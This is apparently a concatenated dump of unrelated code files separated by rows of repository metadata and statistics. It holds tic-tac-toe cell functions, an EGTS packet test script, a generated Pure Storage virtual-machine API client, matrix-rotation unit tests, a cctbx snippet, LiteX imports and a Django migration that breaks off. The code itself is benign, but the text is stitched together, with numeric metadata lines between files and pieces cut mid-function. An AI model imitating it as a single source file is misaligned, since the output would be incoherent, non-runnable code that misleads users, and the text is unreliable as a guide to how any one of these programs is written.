return 0 * cell_weight
# cell node for cell 3
def three(this_board):
this_cell = 3
node_name = "three"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 4
def four(this_board):
this_cell = 4
node_name = "four"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 5
def five(this_board):
this_cell = 5
node_name = "five"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 6
def six(this_board):
this_cell = 6
node_name = "six"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 7
def seven(this_board):
this_cell = 7
node_name = "seven"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
# cell node for cell 8
def eight(this_board):
this_cell = 8
node_name = "eight"
cell_weight = cell_weights[this_cell]
if this_cell in this_board:
index = this_board.index(this_cell)
if index % 2 == 0 or index == 0:
if print_cell_results:
# cell contains "X"
print("Cell", node_name, ":", 1 * cell_weight)
return 1 * cell_weight
else:
# cell contains "O"
if print_cell_results:
print("Cell", node_name, ":", -1 * cell_weight)
return -1 * cell_weight
else:
# cell is empty
if print_cell_results:
print("Cell", node_name, ":", 0 * cell_weight)
return 0 * cell_weight
| 28.023438 | 63 | 0.543909 | 930 | 7,174 | 3.944086 | 0.056989 | 0.171756 | 0.107961 | 0.132497 | 0.839967 | 0.839967 | 0.839967 | 0.839967 | 0.837514 | 0.837514 | 0 | 0.024221 | 0.35545 | 7,174 | 255 | 64 | 28.133333 | 0.769031 | 0.137998 | 0 | 0.828221 | 0 | 0 | 0.027887 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055215 | false | 0 | 0 | 0 | 0.220859 | 0.331288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8fb54533029179b516260397c6bf477cc1de2434 | 351 | py | Python | scenarios/without_auth.py | ashirko/egts-debugger-tester | 4074def2fbd6a6f3edd11a07fba4a04a8fc30de8 | [
"MIT"
] | 1 | 2021-04-07T21:33:10.000Z | 2021-04-07T21:33:10.000Z | scenarios/without_auth.py | ashirko/egts-debugger-tester | 4074def2fbd6a6f3edd11a07fba4a04a8fc30de8 | [
"MIT"
] | null | null | null | scenarios/without_auth.py | ashirko/egts-debugger-tester | 4074def2fbd6a6f3edd11a07fba4a04a8fc30de8 | [
"MIT"
] | null | null | null | import scenario
sock = scenario.start_scenario()
nav_packet = b"\x01\x00\x00\x0b\x00\x23\x00\x00\x00\x01\x99\x18\x00\x00\x00\x01\xef\x00\x00\x00\x02\x02\x10" \
b"\x15\x00\xd2\x31\x2b\x10\x4f\xba\x3a\x9e\xd2\x27\xbc\x35\x03\x00\x00\xb2\x00\x00\x00\x00\x00" \
b"\x6a\x8d"
sock.send(nav_packet)
_ = sock.recv(1024)
sock.close() | 39 | 110 | 0.675214 | 68 | 351 | 3.426471 | 0.514706 | 0.309013 | 0.23176 | 0.103004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0.122507 | 351 | 9 | 111 | 39 | 0.483766 | 0 | 0 | 0 | 0 | 0.25 | 0.545455 | 0.522727 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8fbee5d95a726fac6e7f30e375564d1dc558b72c | 8,847 | py | Python | pypureclient/flasharray/FA_2_10/api/virtual_machines_api.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 14 | 2018-12-07T18:30:27.000Z | 2022-02-22T09:12:33.000Z | pypureclient/flasharray/FA_2_10/api/virtual_machines_api.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 28 | 2019-09-17T21:03:52.000Z | 2022-03-29T22:07:35.000Z | pypureclient/flasharray/FA_2_10/api/virtual_machines_api.py | Flav-STOR-WL/py-pure-client | 03b889c997d90380ac5d6380ca5d5432792d3e89 | [
"BSD-2-Clause"
] | 15 | 2020-06-11T15:50:08.000Z | 2022-03-21T09:27:25.000Z | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.10
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re
# python 2 and python 3 compatibility library
import six
from typing import List, Optional
from .. import models
class VirtualMachinesApi(object):
def __init__(self, api_client):
self.api_client = api_client
def api210_virtual_machines_patch_with_http_info(
self,
virtual_machine=None, # type: models.VirtualMachinePost
authorization=None, # type: str
x_request_id=None, # type: str
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.VirtualMachineResponse
"""Modify a virtual machine
Modifies a virtual machine, recovering it from the destroyed state. If recovering the virtual machine causes a conflict with an existing virtual machine, the operation fails.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api210_virtual_machines_patch_with_http_info(virtual_machine, async_req=True)
>>> result = thread.get()
:param VirtualMachinePost virtual_machine: (required)
:param str authorization: Access token (in JWT format) required to use any API endpoint (except `/oauth2`, `/login`, and `/logout`)
:param str x_request_id: Supplied by client during request or generated by server.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: VirtualMachineResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'virtual_machine' is set
if virtual_machine is None:
raise TypeError("Missing the required parameter `virtual_machine` when calling `api210_virtual_machines_patch`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'authorization' in params:
header_params['Authorization'] = params['authorization']
if 'x_request_id' in params:
header_params['X-Request-ID'] = params['x_request_id']
form_params = []
local_var_files = {}
body_params = None
if 'virtual_machine' in params:
body_params = params['virtual_machine']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/api/2.10/virtual-machines', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VirtualMachineResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
def api210_virtual_machines_post_with_http_info(
self,
virtual_machine=None, # type: models.VirtualMachinePost
authorization=None, # type: str
x_request_id=None, # type: str
overwrite=None, # type: bool
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.VirtualMachineResponse
"""Create a virtual machine
Creates one or more virtual machines from a protection group snapshot. If `overwrite` is specified, an existing virtual machine has its volumes overwritten by the snapshot. Otherwise, a new virtual machine is created from the snapshot. If creating the new virtual machine causes a conflict with an existing virtual machine, the operation fails.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api210_virtual_machines_post_with_http_info(virtual_machine, async_req=True)
>>> result = thread.get()
:param VirtualMachinePost virtual_machine: (required)
:param str authorization: Access token (in JWT format) required to use any API endpoint (except `/oauth2`, `/login`, and `/logout`)
:param str x_request_id: Supplied by client during request or generated by server.
:param bool overwrite: If set to `true`, overwrites an existing volume during a volume copy operation. If set to `false` or not set at all and the target name is an existing volume, the volume copy operation fails. Required if the `source: id` or `source: name` body parameter is set and the source overwrites an existing volume during the volume copy operation.
:param bool async_req: Request runs in separate thread and method returns multiprocessing.pool.ApplyResult.
:param bool _return_http_data_only: Returns only data field.
:param bool _preload_content: Response is converted into objects.
:param int _request_timeout: Total request timeout in seconds.
It can also be a tuple of (connection time, read time) timeouts.
:return: VirtualMachineResponse
If the method is called asynchronously,
returns the request thread.
"""
params = {k: v for k, v in six.iteritems(locals()) if v is not None}
# Convert the filter into a string
if params.get('filter'):
params['filter'] = str(params['filter'])
if params.get('sort'):
params['sort'] = [str(_x) for _x in params['sort']]
# verify the required parameter 'virtual_machine' is set
if virtual_machine is None:
raise TypeError("Missing the required parameter `virtual_machine` when calling `api210_virtual_machines_post`")
collection_formats = {}
path_params = {}
query_params = []
if 'overwrite' in params:
query_params.append(('overwrite', params['overwrite']))
header_params = {}
if 'authorization' in params:
header_params['Authorization'] = params['authorization']
if 'x_request_id' in params:
header_params['X-Request-ID'] = params['x_request_id']
form_params = []
local_var_files = {}
body_params = None
if 'virtual_machine' in params:
body_params = params['virtual_machine']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(
['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(
'/api/2.10/virtual-machines', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VirtualMachineResponse',
auth_settings=auth_settings,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
collection_formats=collection_formats,
)
| 42.946602 | 370 | 0.65525 | 1,051 | 8,847 | 5.299715 | 0.198858 | 0.062837 | 0.017953 | 0.025853 | 0.830341 | 0.818851 | 0.805206 | 0.78079 | 0.78079 | 0.78079 | 0 | 0.004919 | 0.264609 | 8,847 | 205 | 371 | 43.156098 | 0.851214 | 0.434498 | 0 | 0.831858 | 1 | 0 | 0.147583 | 0.033727 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026549 | false | 0 | 0.044248 | 0 | 0.097345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8fce28d03e8fd9945add3a265cea24836b39b837 | 14,424 | py | Python | tests/test_matrix_rotation.py | VaibhavHiwase/matrix_rotation | 0cfa5ac4dc354bf2637ec0ed486f0c9940cf1705 | [
"MIT"
] | 5 | 2020-10-04T13:48:44.000Z | 2021-07-27T13:30:04.000Z | tests/test_matrix_rotation.py | vhiwase/matrix-rotation | 0cfa5ac4dc354bf2637ec0ed486f0c9940cf1705 | [
"MIT"
] | null | null | null | tests/test_matrix_rotation.py | vhiwase/matrix-rotation | 0cfa5ac4dc354bf2637ec0ed486f0c9940cf1705 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_matrix_rotation
----------------------------------
Tests for `matrix_rotation` module.
"""
import unittest
from click.testing import CliRunner
from matrix_rotation import rotate_matrix, matrix_rotation_cli
__all__ = ['Test_matrix_rotation']
class Test_matrix_rotation(unittest.TestCase):
def array_shape(self, matrix):
matrix_length = len(matrix)
for list_num, each_list in enumerate(matrix):
assert matrix_length == len(each_list)
else:
return (matrix_length, len(each_list))
def setUp(self):
self.matrix = [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
self.degrees = [15, 30, 45, 60, 90]
self.clockwise_any_degree_result_dictionary = {
15: [['10', '11', '12', '13', '14', '15', '16'],
['9', '26', '27', '28', '29', '30', '17'],
['8', '25', '41', '42', '43', '31', '18'],
['7', '40', '48', '49', '44', '32', '19'],
['6', '39', '47', '46', '45', '33', '20'],
['5', '38', '37', '36', '35', '34', '21'],
['4', '3', '2', '1', '24', '23', '22']],
30: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
45: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
60: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
90: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
}
self.anticlockwise_any_degree_result_dictionary = {
15: [['16', '17', '18', '19', '20', '21', '22'],
['15', '40', '25', '26', '27', '28', '23'],
['14', '39', '41', '42', '43', '29', '24'],
['13', '38', '48', '49', '44', '30', '1'],
['12', '37', '47', '46', '45', '31', '2'],
['11', '36', '35', '34', '33', '32', '3'],
['10', '9', '8', '7', '6', '5', '4']],
30: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
45: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
60: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']],
90: [['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
}
def test_rotate_matrix_shape_degree_1_clockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=True)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_degree_1_clockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=True)
self.assertEqual(rotated_matrix,
[['24', '1', '2', '3', '4', '5', '6'],
['23', '40', '25', '26', '27', '28', '7'],
['22', '39', '48', '41', '42', '29', '8'],
['21', '38', '47', '49', '43', '30', '9'],
['20', '37', '46', '45', '44', '31', '10'],
['19', '36', '35', '34', '33', '32', '11'],
['18', '17', '16', '15', '14', '13', '12']])
def test_rotate_matrix_shape_degree_1_anticlockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=False)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_degree_1_anticlockwise(self):
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=1, clockwise=False)
self.assertEqual(rotated_matrix,
[['2', '3', '4', '5', '6', '7', '8'],
['1', '26', '27', '28', '29', '30', '9'],
['24', '25', '42', '43', '44', '31', '10'],
['23', '40', '41', '49', '45', '32', '11'],
['22', '39', '48', '47', '46', '33', '12'],
['21', '38', '37', '36', '35', '34', '13'],
['20', '19', '18', '17', '16', '15', '14']])
def test_rotate_matrix_shape_any_degree_clockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=True)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_any_degree_clockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=True)
self.assertEqual(
rotated_matrix,
self.clockwise_any_degree_result_dictionary[degree])
def test_rotate_matrix_shape_any_degree_anticlockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=False)
self.assertEqual(self.array_shape(rotated_matrix),
self.array_shape(self.matrix))
def test_rotate_matrix_any_degree_anticlockwise(self):
for degree in self.degrees:
rotated_matrix = rotate_matrix(
matrix=self.matrix, degree=degree, clockwise=False)
self.assertEqual(
rotated_matrix,
self.anticlockwise_any_degree_result_dictionary[degree])
def test_command_line_interface_options(self):
target_string = 'Show this message and exit.'
runner = CliRunner()
help_result = runner.invoke(matrix_rotation_cli.main, ['--help'])
self.assertEqual(help_result.exit_code, 0)
self.assertTrue(target_string in help_result.output)
def test_command_line_interface_matrix(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = "[['24', '1', '2', '3', '4', '5', '6'], ['23', '40', '25', '26', '27', '28', '7'], ['22', '39', '48', '41', '42', '29', '8'], ['21', '38', '47', '49', '43', '30', '9'], ['20', '37', '46', '45', '44', '31', '10'], ['19', '36', '35', '34', '33', '32', '11'], ['18', '17', '16', '15', '14', '13', '12']]"
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
def test_command_line_interface_degree(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = "[['20', '21', '22', '23', '24', '1', '2'], ['19', '36', '37', '38', '39', '40', '3'], ['18', '35', '44', '45', '46', '25', '4'], ['17', '34', '43', '49', '47', '26', '5'], ['16', '33', '42', '41', '48', '27', '6'], ['15', '32', '31', '30', '29', '28', '7'], ['14', '13', '12', '11', '10', '9', '8']]"
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix, "--degree", 5])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
def test_command_line_interface_clockwise(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = "[['4', '5', '6', '7', '8', '9', '10'], ['3', '28', '29', '30', '31', '32', '11'], ['2', '27', '44', '45', '46', '33', '12'], ['1', '26', '43', '49', '47', '34', '13'], ['24', '25', '42', '41', '48', '35', '14'], ['23', '40', '39', '38', '37', '36', '15'], ['22', '21', '20', '19', '18', '17', '16']]"
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix, "--degree", 3,
"--clockwise", False])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
def test_command_line_interface_print_matrix(self):
input_matrix = "[['1', '2', '3', '4', '5', '6', '7'],\
['24', '25', '26', '27', '28', '29', '8'],\
['23', '40', '41', '42', '43', '30', '9'],\
['22', '39', '48', '49', '44', '31', '10'],\
['21', '38', '47', '46', '45', '32', '11'],\
['20', '37', '36', '35', '34', '33', '12'],\
['19', '18', '17', '16', '15', '14', '13']]"
target_matrix = """Original Matrix:
[['1', '2', '3', '4', '5', '6', '7'],
['24', '25', '26', '27', '28', '29', '8'],
['23', '40', '41', '42', '43', '30', '9'],
['22', '39', '48', '49', '44', '31', '10'],
['21', '38', '47', '46', '45', '32', '11'],
['20', '37', '36', '35', '34', '33', '12'],
['19', '18', '17', '16', '15', '14', '13']]
Clockwise Rotated Matrix with Degree = 4:
[['21', '22', '23', '24', '1', '2', '3'],
['20', '37', '38', '39', '40', '25', '4'],
['19', '36', '45', '46', '47', '26', '5'],
['18', '35', '44', '49', '48', '27', '6'],
['17', '34', '43', '42', '41', '28', '7'],
['16', '33', '32', '31', '30', '29', '8'],
['15', '14', '13', '12', '11', '10', '9']]
---------------------------------------------
[['21', '22', '23', '24', '1', '2', '3'], ['20', '37', '38', '39', '40', '25', '4'], ['19', '36', '45', '46', '47', '26', '5'], ['18', '35', '44', '49', '48', '27', '6'], ['17', '34', '43', '42', '41', '28', '7'], ['16', '33', '32', '31', '30', '29', '8'], ['15', '14', '13', '12', '11', '10', '9']]"""
runner = CliRunner()
result = runner.invoke(matrix_rotation_cli.main, args=[
"--matrix", input_matrix, "--degree", 4,
"--clockwise", True, "--print_matrix", True])
self.assertEqual(result.exit_code, 0)
self.assertTrue(target_matrix in result.output)
if __name__ == '__main__':
unittest.main()
| 51.698925 | 325 | 0.370008 | 1,701 | 14,424 | 3.031158 | 0.074074 | 0.00737 | 0.02211 | 0.013189 | 0.823119 | 0.794414 | 0.75737 | 0.703452 | 0.703452 | 0.703452 | 0 | 0.217053 | 0.330837 | 14,424 | 278 | 326 | 51.884892 | 0.317136 | 0.00929 | 0 | 0.625532 | 0 | 0.195745 | 0.250683 | 0.003151 | 0 | 0 | 0 | 0 | 0.080851 | 1 | 0.06383 | false | 0 | 0.012766 | 0 | 0.085106 | 0.008511 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ff9ff6c8050d57b8d26e513ffb95a4b8168d925 | 424 | py | Python | MillerArrays/millerMtzImports.py | MooersLab/jupyterlabcctbxsnipsplus | 80a380046adcc9b16581ed1681884017514edbb7 | [
"MIT"
] | null | null | null | MillerArrays/millerMtzImports.py | MooersLab/jupyterlabcctbxsnipsplus | 80a380046adcc9b16581ed1681884017514edbb7 | [
"MIT"
] | null | null | null | MillerArrays/millerMtzImports.py | MooersLab/jupyterlabcctbxsnipsplus | 80a380046adcc9b16581ed1681884017514edbb7 | [
"MIT"
] | null | null | null | # Description: Read a mtz file into a miller array.
# Source: NA
"""
from iotbx.reflection_file_reader import any_reflection_file
hkl_file = any_reflection_file("${1:3hz7.mtz}")
miller_arrays = hkl_file.as_miller_arrays(merge_equivalents=False)
"""
from iotbx.reflection_file_reader import any_reflection_file
hkl_file = any_reflection_file("3hz7.mtz")
miller_arrays = hkl_file.as_miller_arrays(merge_equivalents=False)
| 32.615385 | 66 | 0.816038 | 64 | 424 | 5.03125 | 0.375 | 0.26087 | 0.21118 | 0.142857 | 0.850932 | 0.850932 | 0.850932 | 0.850932 | 0.850932 | 0.850932 | 0 | 0.012987 | 0.091981 | 424 | 12 | 67 | 35.333333 | 0.823377 | 0.563679 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
64eadc0dffcd5e0c6737f03b669d1136244f82d9 | 108 | py | Python | litex/build/altera/__init__.py | osterwood/litex | db20cb172dc982c5879aa8080ec7aa18de181cc5 | [
"ADSL"
] | 1,501 | 2016-04-19T18:16:21.000Z | 2022-03-31T17:46:31.000Z | litex/build/altera/__init__.py | osterwood/litex | db20cb172dc982c5879aa8080ec7aa18de181cc5 | [
"ADSL"
] | 1,135 | 2016-04-19T05:49:14.000Z | 2022-03-31T15:21:19.000Z | litex/build/altera/__init__.py | osterwood/litex | db20cb172dc982c5879aa8080ec7aa18de181cc5 | [
"ADSL"
] | 357 | 2016-04-19T05:00:24.000Z | 2022-03-31T11:28:32.000Z | from litex.build.altera.platform import AlteraPlatform
from litex.build.altera.programmer import USBBlaster
| 36 | 54 | 0.87037 | 14 | 108 | 6.714286 | 0.642857 | 0.191489 | 0.297872 | 0.425532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 108 | 2 | 55 | 54 | 0.94 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
64f07a4446dcb8c696bcf6e538a2fae382c48c78 | 4,426 | py | Python | crm/migrations/0005_auto_20161023_1605.py | bpatyi/simpleCRM | bf74f0e0d783ea4538fb96b6790474d991175b51 | [
"MIT"
] | 2 | 2016-10-03T08:35:07.000Z | 2016-10-04T07:22:20.000Z | crm/migrations/0005_auto_20161023_1605.py | bpatyi/simpleCRM | bf74f0e0d783ea4538fb96b6790474d991175b51 | [
"MIT"
] | null | null | null | crm/migrations/0005_auto_20161023_1605.py | bpatyi/simpleCRM | bf74f0e0d783ea4538fb96b6790474d991175b51 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-23 16:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crm', '0004_auto_20161023_1143'),
]
operations = [
migrations.RenameField(
model_name='inboundcontactaddress',
old_name='city',
new_name='administrative_area',
),
migrations.RenameField(
model_name='inboundcontactaddress',
old_name='address',
